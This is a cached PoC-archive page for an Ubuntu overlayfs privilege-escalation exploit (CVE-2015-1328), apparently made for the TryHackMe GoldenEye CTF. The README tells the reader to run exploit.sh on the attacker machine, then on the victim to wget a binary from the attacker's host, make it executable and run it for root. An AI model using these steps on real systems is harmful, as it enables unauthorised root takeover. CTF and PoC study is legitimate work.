CVE-2015-1328 PoC — Ubuntu overlayfs组件提权漏洞

Source

https://github.com/elit3pwner/CVE-2015-1328-GoldenEye

Associated Vulnerability

Title:Ubuntu overlayfs组件提权漏洞 (CVE-2015-1328)
Description:Ubuntu是英国科能（Canonical）公司和Ubuntu基金会共同开发的一套以桌面应用为主的GNU/Linux操作系统。 Ubuntu 15.04及之前版本中的linux数据包3.19.0至21.21版本的overlayfs组件存在本地提权漏洞，该漏洞源于该文件系统没有正确检查文件权限。本地攻击者可利用该漏洞获取系统的管理员权限，完全控制受影响计算机。

Description

kernel exploit

Readme

# CVE-2015-1328-GoldenEye


# about exploit:
The overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. 

Thanks to rebel

# Config

This is an automated exploit for CVE-2015-1328 for GoldenEye CTF from TryHackMe 
by default, gcc isn't available in that machine so, i configured the gcc to cc and accordingly ran the exploit to gain root privileges.

# Simply clone the repo and run exploit.sh 

# On Attacker's machine:

Installation

Just, Clone this repository - 

    $ git clone https://github.com/0x1ns4n3/CVE-2015-1328-GoldenEye.git
    $ cd CVE-2015-1328-GoldenEye
    $ chmod +x exploit.sh
    $ bash exploit.sh
    
    
# On Victim's machine :

    $ wget http://<target ip>:6969/exploit
    
    $ chmod +x exploit
    
    $ ./exploit

File Snapshot


 [4.0K]  /data/pocs/7eb0d6886bd534cd6849e6fec33617a8a24518e6
├── [4.9K]  exploit.c
├── [  64]  exploit.sh
└── [1.0K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!